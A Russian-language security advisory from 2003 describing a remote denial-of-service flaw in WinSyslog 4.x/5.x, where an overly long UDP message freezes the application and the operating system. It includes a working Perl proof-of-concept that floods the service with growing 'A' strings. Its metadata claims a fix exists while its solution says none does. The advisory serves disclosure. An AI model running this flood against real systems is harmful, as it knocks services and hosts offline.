Удаленный отказ в обслуживании против WinSyslog

Дата публикации:
15.10.2003
Всего просмотров:
952
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
WinSyslog 4.x
WinSyslog 5.x
Уязвимые версии: WinSyslog version 4.21 SP1

Описание: Уязвимость обнаружена в WinSyslog. Удаленный атакующий может заверсить работу приложения и системы.

Удаленный атакующий может послать чрезмерно длинное сообщение к WinSyslog программе, чтобы завесить работу WinSyslog и операционной системы.

Пример/Эксплоит:

#!/usr/bin/perl
#WinSyslog System Freeze Vulnerability

use IO::Socket;
$host = "192.168.1.44";
$port = "10514";
$data = "A";

$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
$@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

for ($count = 0; $count < 1000; $count ++)
{
$buf = "";
$buf .= "A"x((600+$count)*4);

print "Length: ", length($buf), "\n";
send($socket, $buf, 0, $portaddr);
print "sent\n";
}

print "Done\n";

URL производителя:http://WinSyslog.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Ограничьте доступ к программе только из доверенных IP адресов.

или введите имя

CAPTCHA